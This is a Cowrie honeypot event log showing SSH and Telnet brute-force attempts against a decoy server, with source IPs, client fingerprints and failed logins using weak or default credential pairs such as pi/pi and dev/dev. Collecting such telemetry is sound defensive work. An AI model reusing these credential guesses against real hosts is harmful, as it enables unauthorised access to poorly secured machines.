{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:55:43.985548Z","src_ip":"185.93.89.7","session":"927075e32894"}
{"eventid":"cowrie.login.failed","username":"index","password":"147258369","message":"login attempt [index/147258369] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:44.024731Z","src_ip":"185.93.89.7","session":"927075e32894"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:45.151995Z","src_ip":"185.93.89.7","session":"927075e32894"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50166,"dst_ip":"1.2.3.4","dst_port":22,"session":"da780d299c40","protocol":"ssh","message":"New connection: 51.79.164.132:50166 (1.2.3.4:22) [session: da780d299c40]","sensor":"my-vps","timestamp":"2025-08-28T09:55:49.866363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:55:50.192321Z","src_ip":"51.79.164.132","session":"da780d299c40"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:55:50.193083Z","src_ip":"51.79.164.132","session":"da780d299c40"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:53.362280Z","src_ip":"51.79.164.132","session":"da780d299c40"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:54.571728Z","src_ip":"51.79.164.132","session":"da780d299c40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58150,"dst_ip":"1.2.3.4","dst_port":23,"session":"33de6bc7a0d9","protocol":"telnet","message":"New connection: 212.227.125.160:58150 (1.2.3.4:23) [session: 33de6bc7a0d9]","sensor":"my-vps","timestamp":"2025-08-28T09:55:57.168689Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33120,"dst_ip":"1.2.3.4","dst_port":22,"session":"5db9ec572abf","protocol":"ssh","message":"New connection: 185.93.89.7:33120 (1.2.3.4:22) [session: 5db9ec572abf]","sensor":"my-vps","timestamp":"2025-08-28T09:56:12.459730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:56:12.460401Z","src_ip":"185.93.89.7","session":"5db9ec572abf"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:56:12.478910Z","src_ip":"185.93.89.7","session":"5db9ec572abf"}
{"eventid":"cowrie.login.failed","username":"index","password":"007007","message":"login attempt [index/007007] failed","sensor":"my-vps","timestamp":"2025-08-28T09:56:12.516201Z","src_ip":"185.93.89.7","session":"5db9ec572abf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:56:13.619410Z","src_ip":"185.93.89.7","session":"5db9ec572abf"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":51044,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ea7f28725f","protocol":"ssh","message":"New connection: 51.79.164.132:51044 (1.2.3.4:22) [session: 35ea7f28725f]","sensor":"my-vps","timestamp":"2025-08-28T09:56:16.169159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:56:16.373678Z","src_ip":"51.79.164.132","session":"35ea7f28725f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:56:16.374361Z","src_ip":"51.79.164.132","session":"35ea7f28725f"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:56:19.725149Z","src_ip":"51.79.164.132","session":"35ea7f28725f"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:56:20.937454Z","src_ip":"51.79.164.132","session":"35ea7f28725f"}
{"eventid":"cowrie.session.closed","duration":31.312399864196777,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:56:28.480987Z","src_ip":"212.227.125.160","session":"33de6bc7a0d9"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51080,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e48709bbeb","protocol":"ssh","message":"New connection: 185.93.89.7:51080 (1.2.3.4:22) [session: e9e48709bbeb]","sensor":"my-vps","timestamp":"2025-08-28T09:56:37.226372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:56:37.227870Z","src_ip":"185.93.89.7","session":"e9e48709bbeb"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:56:37.246034Z","src_ip":"185.93.89.7","session":"e9e48709bbeb"}
{"eventid":"cowrie.login.failed","username":"index","password":"mnbvcxz","message":"login attempt [index/mnbvcxz] failed","sensor":"my-vps","timestamp":"2025-08-28T09:56:37.283308Z","src_ip":"185.93.89.7","session":"e9e48709bbeb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:56:38.422235Z","src_ip":"185.93.89.7","session":"e9e48709bbeb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56996,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65cb53569b4","protocol":"ssh","message":"New connection: 51.79.164.132:56996 (1.2.3.4:22) [session: b65cb53569b4]","sensor":"my-vps","timestamp":"2025-08-28T09:56:42.371668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:56:42.729210Z","src_ip":"51.79.164.132","session":"b65cb53569b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:56:42.729873Z","src_ip":"51.79.164.132","session":"b65cb53569b4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T09:56:44.403266Z","src_ip":"51.79.164.132","session":"b65cb53569b4"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:56:45.988786Z","src_ip":"51.79.164.132","session":"b65cb53569b4"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42668,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cd09b3de78a","protocol":"ssh","message":"New connection: 185.93.89.7:42668 (1.2.3.4:22) [session: 6cd09b3de78a]","sensor":"my-vps","timestamp":"2025-08-28T09:57:01.471047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:01.471899Z","src_ip":"185.93.89.7","session":"6cd09b3de78a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:57:01.495036Z","src_ip":"185.93.89.7","session":"6cd09b3de78a"}
{"eventid":"cowrie.login.failed","username":"index","password":"a123456","message":"login attempt [index/a123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:01.535506Z","src_ip":"185.93.89.7","session":"6cd09b3de78a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:02.557351Z","src_ip":"185.93.89.7","session":"6cd09b3de78a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46110,"dst_ip":"1.2.3.4","dst_port":22,"session":"85eeb9fe2455","protocol":"ssh","message":"New connection: 51.79.164.132:46110 (1.2.3.4:22) [session: 85eeb9fe2455]","sensor":"my-vps","timestamp":"2025-08-28T09:57:09.032697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:09.414624Z","src_ip":"51.79.164.132","session":"85eeb9fe2455"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:57:09.415315Z","src_ip":"51.79.164.132","session":"85eeb9fe2455"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:13.178160Z","src_ip":"51.79.164.132","session":"85eeb9fe2455"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:14.881894Z","src_ip":"51.79.164.132","session":"85eeb9fe2455"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59808,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0b2f0e8e74","protocol":"ssh","message":"New connection: 217.72.205.35:59808 (1.2.3.4:22) [session: 0e0b2f0e8e74]","sensor":"my-vps","timestamp":"2025-08-28T09:57:24.883226Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:24.884435Z","src_ip":"217.72.205.35","session":"0e0b2f0e8e74"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53624,"dst_ip":"1.2.3.4","dst_port":22,"session":"1177454f3780","protocol":"ssh","message":"New connection: 185.93.89.7:53624 (1.2.3.4:22) [session: 1177454f3780]","sensor":"my-vps","timestamp":"2025-08-28T09:57:25.840763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:25.854709Z","src_ip":"185.93.89.7","session":"1177454f3780"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:57:25.864015Z","src_ip":"185.93.89.7","session":"1177454f3780"}
{"eventid":"cowrie.login.failed","username":"index","password":"147852","message":"login attempt [index/147852] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:26.018811Z","src_ip":"185.93.89.7","session":"1177454f3780"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:27.040385Z","src_ip":"185.93.89.7","session":"1177454f3780"}
